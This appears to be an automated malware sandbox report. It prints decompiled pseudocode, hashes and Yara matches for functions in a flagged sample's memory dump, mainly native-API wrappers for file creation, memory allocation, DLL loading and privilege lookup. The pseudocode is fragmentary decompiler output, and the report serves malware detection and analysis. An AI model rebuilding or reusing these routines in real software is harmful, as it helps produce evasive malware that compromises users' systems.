                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID: !:A$b=A$b=A
                • API String ID: 2738559852-704622139
                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                				char* _v8;
                				struct _EXCEPTION_RECORD _v12;
                				struct _OBJDIR_INFORMATION _v16;
                				char _v536;
                				void* _t15;
                				struct _OBJDIR_INFORMATION _t17;
                				struct _OBJDIR_INFORMATION _t18;
                				void* _t30;
                				void* _t31;
                				void* _t32;
                
                				_v8 =  &_v536;
                				_t15 = E0041AF60( &_v12, 0x104, _a8);
                				_t31 = _t30 + 0xc;
                				if(_t15 != 0) {
                					_t17 = E0041B380(__eflags, _v8);
                					_t32 = _t31 + 4;
                					__eflags = _t17;
                					if(_t17 != 0) {
                						E0041B600( &_v12, 0);
                						_t32 = _t32 + 8;
                					}
                					_t18 = E00419710(_v8);
                					_v16 = _t18;
                					__eflags = _t18;
                					if(_t18 == 0) {
                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                						return _v16;
                					}
                					return _t18;
                				} else {
                					return _t15;
                				}
                			}

                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                				long _t21;
                				void* _t31;
                
                				_t3 = _a4 + 0xc40; // 0xc40
                				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                				return _t21;
                			}

                APIs
                • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E004187AA(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                				long _t14;
                				void* _t22;
                
                				asm("adc bh, [ecx]");
                				asm("cmc");
                				asm("adc al, 0x55");
                				_t10 = _a4;
                				_t3 = _t10 + 0xc60; // 0xca0
                				E004191D0(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                				return _t14;
                			}

                APIs
                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: e31ce3003adeb8860dd4fa1241d8148ee91c531cd0dcb13074cba61c864653b8
                • Instruction ID: f262f8c217c9b4ffbc9aa3d44d458ab48d0004ac55a622bd76468cc8f31c0f1a
                • Opcode Fuzzy Hash: e31ce3003adeb8860dd4fa1241d8148ee91c531cd0dcb13074cba61c864653b8
                • Instruction Fuzzy Hash: E3F058B1200208AFDB14DF98DC91EE777A8AF8C754F148149FE089B241C630E811CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                				long _t14;
                				void* _t21;
                
                				_t3 = _a4 + 0xc60; // 0xca0
                				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                				return _t14;
                			}

                APIs
                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E004186FB(char __edx, intOrPtr _a12, void* _a16) {
                				char _v117;
                				long _t9;
                				signed int _t13;
                				signed int _t14;
                				signed int _t15;
                
                				_pop(_t13);
                				_pop(_t14);
                				_t15 = _t14 | _t13;
                				_v117 = __edx;
                				_t6 = _a12;
                				_t3 = _t6 + 0x10; // 0x300
                				_push(_t15);
                				_t4 = _t6 + 0xc50; // 0x409753
                				E004191D0(_t13, _a12, _t4,  *_t3, 0, 0x2c);
                				_t9 = NtClose(_a16); // executed
                				return _t9;
                			}

                APIs
                • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: c574c6b45b536e070185df003f7dabd17914bd51b3e87ace7d1999e688412dd0
                • Instruction ID: 87013b575aafa25b71f174344f1d4c83acff58307a86ac4eff59b1435d4caae2
                • Opcode Fuzzy Hash: c574c6b45b536e070185df003f7dabd17914bd51b3e87ace7d1999e688412dd0
                • Instruction Fuzzy Hash: F1E086366001147BD710DBA9CC45EDBBB58DF94250F15415AFA5DD7242C170A50086E0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00418700(intOrPtr _a4, void* _a8) {
                				long _t8;
                				void* _t11;
                
                				_t5 = _a4;
                				_t2 = _t5 + 0x10; // 0x300
                				_t3 = _t5 + 0xc50; // 0x409753
                				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                				_t8 = NtClose(_a8); // executed
                				return _t8;
                			}

                APIs
                • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 210a85ba393020ac1e99eacd22f1bc2bf3bf1943ca8a43b2c8e928e5ef6a7931
                • Instruction ID: e0d7bd5a6bfadb0fcf8a9769120b48ce2fc73b95c2fcb489c00796d59b3111b5
                • Opcode Fuzzy Hash: 210a85ba393020ac1e99eacd22f1bc2bf3bf1943ca8a43b2c8e928e5ef6a7931
                • Instruction Fuzzy Hash: 159002A134100442D10061994418B160045E7E2381F51C115E6058664DC659CD6A7166
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
                • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                				void* _t10;
                				void* _t15;
                
                				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                				_t6 =  &_a8; // 0x413526
                				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                				return _t10;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID: &5A
                • API String ID: 1279760036-1617645808
                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00407305(void* __eax, signed int __ebx, intOrPtr _a4, intOrPtr _a8, long _a12, int _a16, int _a20) {
                				int _v4;
                				intOrPtr _v8;
                				char _v64;
                				long _v128;
                				int _v132;
                				char _v652;
                				long _v664;
                				char _v684;
                				intOrPtr _v688;
                				intOrPtr __edi;
                				int __esi;
                				void* __ebp;
                				void* _t66;
                				int _t67;
                				signed int _t71;
                				long _t76;
                				int _t80;
                				void* _t82;
                
                				_t71 = __ebx * 0xf0a6f635;
                				_t88 = _t71;
                				if(_t71 >= 0) {
                					 *[cs:eax] =  *[cs:eax] + __eax + _t71;
                					E0041AD10( &_v64, 3);
                					_t66 = E00409B30(_t88, _a8 + 0x1c,  &_v64); // executed
                					_t67 = E00413E40(_a8 + 0x1c, _t66, 0, 0, 0xc4e7b6d6);
                					_t80 = _t67;
                					if(_t80 != 0) {
                						_t76 = _a12;
                						_t67 = PostThreadMessageW(_t76, 0x111, 0, 0); // executed
                						_t90 = _t67;
                						if(_t67 == 0) {
                							_t67 =  *_t80(_t76, 0x8003, _t82 + (E00409290(_t90, 1, 8) & 0x000000ff) - 0x40, _t67);
                						}
                					}
                					return _t67;
                				} else {
                					if(__eflags == 0) {
                						__eflags = __al - 0x55;
                						_push(__ebp);
                						__ebp = __esp;
                						__esp = __esp - 0x2ac;
                						_push(__ebx);
                						_push(__esi);
                						_push(__edi);
                						__eax = 0;
                						__eflags = 0;
                						_v8 = 0;
                						_v688 = 0;
                						 &_v684 = E0041A130( &_v684, 0, 0x2a4);
                						__esi = _a16;
                						__ecx =  *((intOrPtr*)(__esi + 0x300));
                						__edi = _a4;
                						__eax = E00407280(__ecx, _a4, __ecx); // executed
                						__eax = E004199C0(__ecx);
                						_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
                						__ebx = __eax + _t15;
                					}
                					asm("adc [eax], al");
                					__al = __al +  *__eax;
                					_a20 = 0;
                					while(1) {
                						__eax = E0040D3C0(__edi, 0xfe363c80); // executed
                						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                						__eax =  &_v684;
                						__eax = E00418770(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v684, 0x2a8, 0); // executed
                						 *(__esi + 0x2dc) = __eax;
                						__eflags = __eax;
                						if(__eax < 0) {
                							break;
                						}
                						__eflags = _v652;
                						if(_v652 == 0) {
                							L15:
                							__eax = _a20;
                							__eax = _a20 + 1;
                							_a20 = __eax;
                							__eflags = __eax - 2;
                							if(__eax < 2) {
                								continue;
                							} else {
                								__ebx = _v4;
                								goto L19;
                							}
                						} else {
                							__eflags = _v664;
                							if(_v664 == 0) {
                								goto L15;
                							} else {
                								__eflags = _v132;
                								if(_v132 == 0) {
                									goto L15;
                								} else {
                									__eflags = _v128;
                									if(_v128 != 0) {
                										__eax = _a16;
                										__edx =  &_v684;
                										__ebx = 1;
                										__eax = E0041A0B0(_a16,  &_v684, 0x2a8);
                										L19:
                										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                										__eax = E00418700(__edi,  *((intOrPtr*)(__esi + 0x2f4)));
                										__eflags = __ebx;
                										if(__ebx == 0) {
                											break;
                										} else {
                											__edx = _v664;
                											__eax = _a16;
                											__ecx = _v132;
                											 *(_a16 + 0x14) = _v664;
                											__edx =  *(__esi + 0x2d0);
                											_t35 = __esi + 0x2e8; // 0x2e8
                											__eax = _t35;
                											 *_t35 = _v132;
                											__eax = _a16;
                											_t37 = __esi + 0x314; // 0x314
                											__ebx = _t37;
                											__ecx = 0;
                											__eax = _a16 + 0x220;
                											 *__ebx = 0x18;
                											 *((intOrPtr*)(__esi + 0x318)) = 0;
                											 *((intOrPtr*)(__esi + 0x320)) = 0;
                											 *((intOrPtr*)(__esi + 0x31c)) = 0;
                											 *((intOrPtr*)(__esi + 0x324)) = 0;
                											 *((intOrPtr*)(__esi + 0x328)) = 0;
                											__eax = E00417F80(__edi, _a16 + 0x220,  *(__esi + 0x2d0), __ebx, _a16 + 0x220);
                											__ecx = 0;
                											 *(__esi + 0x2dc) = __eax;
                											__eflags = __eax;
                											if(__eax < 0) {
                												break;
                											} else {
                												__edx = _v128;
                												_t45 = __esi + 0x2e0; // 0x2e0
                												__eax = _t45;
                												 *((intOrPtr*)(__esi + 0x318)) = 0;
                												 *((intOrPtr*)(__esi + 0x320)) = 0;
                												 *((intOrPtr*)(__esi + 0x31c)) = 0;
                												 *((intOrPtr*)(__esi + 0x324)) = 0;
                												 *((intOrPtr*)(__esi + 0x328)) = 0;
                												_a16 = _a16 + 0x224;
                												 *(__esi + 0x2e4) = _v128;
                												 *__ebx = 0x18;
                												 *(__esi + 0x2d0) = 0x1a;
                												__eax = E00417FC0(__edi, _a16 + 0x224, 0x1a, __ebx, _t45);
                												 *(__esi + 0x2dc) = __eax;
                												__eflags = __eax;
                												if(__eax < 0) {
                													break;
                												} else {
                													__edx = _a12;
                													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
                													__eflags =  *(__edx + 0x10) + 0x200;
                													__eax = E00419660(__ecx);
                													__ebx = __eax;
                													__eax =  *(__ebx + 0x28);
                													__eax = E0041A3A0( *(__ebx + 0x28));
                													__edx =  *(__ebx + 0x28);
                													_t60 = __eax + 2; // 0x2
                													__ecx = __eax + _t60;
                													__eax =  &_v652;
                													__eax = E00413A40(__edi,  &_v652, 2, 0); // executed
                													_pop(__edi);
                													_pop(__esi);
                													_pop(__ebx);
                													__esp = __ebp;
                													_pop(__ebp);
                													return __eax;
                												}
                											}
                										}
                									} else {
                										goto L15;
                									}
                								}
                							}
                						}
                						goto L23;
                					}
                					_pop(__edi);
                					_pop(__esi);
                					__eax = 0;
                					__eflags = 0;
                					_pop(__ebx);
                					__esp = __ebp;
                					_pop(__ebp);
                					return 0;
                				}
                				L23:
                			}

                APIs
                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID:
                • API String ID: 1836367815-0
                • Opcode ID: ce300330146a8661e7410a329c44b7f78299cf6c0a400ce6e22a8cdd61fc44e6
                • Instruction ID: 8cf4fbbc09d6be6740cf1c0a9c8f6e5ec51e4ce6f5358c01997198c23fb72c64
                • Opcode Fuzzy Hash: ce300330146a8661e7410a329c44b7f78299cf6c0a400ce6e22a8cdd61fc44e6
                • Instruction Fuzzy Hash: 02619471900309AFDB25DF64DC86FEB77B8AB05304F10446EF949A7281D778AD41CBAA
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: LookupPrivilegeValue
                • String ID:
                • API String ID: 3899507212-0
                • Opcode ID: 6e2e3cb4d51242afeca40aab31b1a5c4cda87ccc28f373da820936786e375428
                • Instruction ID: 3e08fda0d151c04d680ca7af3dfef04ea5fb34e5a70fe15e182c7e7206429ebc
                • Opcode Fuzzy Hash: 6e2e3cb4d51242afeca40aab31b1a5c4cda87ccc28f373da820936786e375428
                • Instruction Fuzzy Hash: D82138B5200208AFDB14DF99DC84EEB77ADAF88790F148259FA4C97241CA34E855CBB4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00407280(void* __ecx, intOrPtr _a4, long _a8) {
                				char _v67;
                				char _v68;
                				char* _t9;
                				void* _t13;
                				intOrPtr* _t14;
                				int _t15;
                				long _t23;
                				intOrPtr* _t27;
                				void* _t28;
                				void* _t32;
                
                				_push(0x3f);
                				_t9 =  &_v67;
                				_push(0);
                				_push(_t9);
                				_v68 = 0;
                				 *[cs:eax] =  *[cs:eax] + _t9 + __ecx;
                				E0041AD10( &_v68, 3);
                				_t13 = E00409B30(_t32, _a4 + 0x1c,  &_v68); // executed
                				_t14 = E00413E40(_a4 + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
                				_t27 = _t14;
                				if(_t27 != 0) {
                					_t23 = _a8;
                					_t15 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
                					_t34 = _t15;
                					if(_t15 == 0) {
                						_t15 =  *_t27(_t23, 0x8003, _t28 + (E00409290(_t34, 1, 8) & 0x000000ff) - 0x40, _t15);
                					}
                					return _t15;
                				}
                				return _t14;
                			}

                APIs
                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID:
                • API String ID: 1836367815-0
                • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
                • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E004188D2(void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                				intOrPtr _v117;
                				char _t12;
                				void* _t17;
                
                				asm("lock xor ebp, esp");
                				asm("o16 int 0x44");
                				_v117 = ss;
                				_t9 = _a4;
                				_t5 = _t9 + 0xc74; // 0xc74
                				E004191D0(_t17, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
                				return _t12;
                			}

                APIs
                • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 95abd86dea0b7fc6c31473d98f33caf3c532a550fd683503335ad1f2126a1b07
                • Instruction ID: 441eb347d5dbeac212da70b84747f9a6760145cc0d3c732275e06d3e4f1b9884
                • Opcode Fuzzy Hash: 95abd86dea0b7fc6c31473d98f33caf3c532a550fd683503335ad1f2126a1b07
                • Instruction Fuzzy Hash: 3EE06DB1600205BFDB18DF95CC4AEDBB7ACEF44750F114559FD089B251D631E914CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                				char _t10;
                				void* _t15;
                
                				_t3 = _a4 + 0xc74; // 0xc74
                				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                				return _t10;
                			}

                APIs
                • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                				int _t10;
                				void* _t15;
                
                				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                				return _t10;
                			}

                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: LookupPrivilegeValue
                • String ID:
                • API String ID: 3899507212-0
                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: 50419f7403b405ff8d11456def3b13ba85d096b127995936e86c59acd4bba7cf
                • Instruction ID: 664c109bfab8776e38b0126f392604523e1a590ebb6935f8dbce45a4b840e817
                • Opcode Fuzzy Hash: 50419f7403b405ff8d11456def3b13ba85d096b127995936e86c59acd4bba7cf
                • Instruction Fuzzy Hash: D7D0A9742082403BD7109B288CC9EC33BA88F45300F1889ADBCE82B203C034AA44C7A0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 68b301fd94b954275722a09b62615f2322b6894302e13ce9c4a8807e9877d0eb
                • Instruction ID: 2204a83720acbdedcfd9b4a204bbad34eb0b970d47639a0b49348e1640651e68
                • Opcode Fuzzy Hash: 68b301fd94b954275722a09b62615f2322b6894302e13ce9c4a8807e9877d0eb
                • Instruction Fuzzy Hash: 1FB02B71D010C0C5D601D3B0060C7273A0077C0340F13C011D2024340B4338C194F2B1
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Strings
                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0194B476
                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0194B484
                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0194B3D6
                • The critical section is owned by thread %p., xrefs: 0194B3B9
                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0194B39B
                • Go determine why that thread has not released the critical section., xrefs: 0194B3C5
                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0194B2DC
                • The instruction at %p tried to %s , xrefs: 0194B4B6
                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0194B305
                • *** Resource timeout (%p) in %ws:%s, xrefs: 0194B352
                • *** enter .cxr %p for the context, xrefs: 0194B50D
                • The resource is owned shared by %d threads, xrefs: 0194B37E
                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0194B47D
                • *** then kb to get the faulting stack, xrefs: 0194B51C
                • The instruction at %p referenced memory at %p., xrefs: 0194B432
                • read from, xrefs: 0194B4AD, 0194B4B2
                • This failed because of error %Ix., xrefs: 0194B446
                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0194B2F3
                • an invalid address, %p, xrefs: 0194B4CF
                • <unknown>, xrefs: 0194B27E, 0194B2D1, 0194B350, 0194B399, 0194B417, 0194B48E
                • write to, xrefs: 0194B4A6
                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0194B314
                • *** enter .exr %p for the exception record, xrefs: 0194B4F1
                • a NULL pointer, xrefs: 0194B4E0
                • *** An Access Violation occurred in %ws:%s, xrefs: 0194B48F
                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0194B323
                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0194B38F
                • The resource is owned exclusively by thread %p, xrefs: 0194B374
                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0194B53F
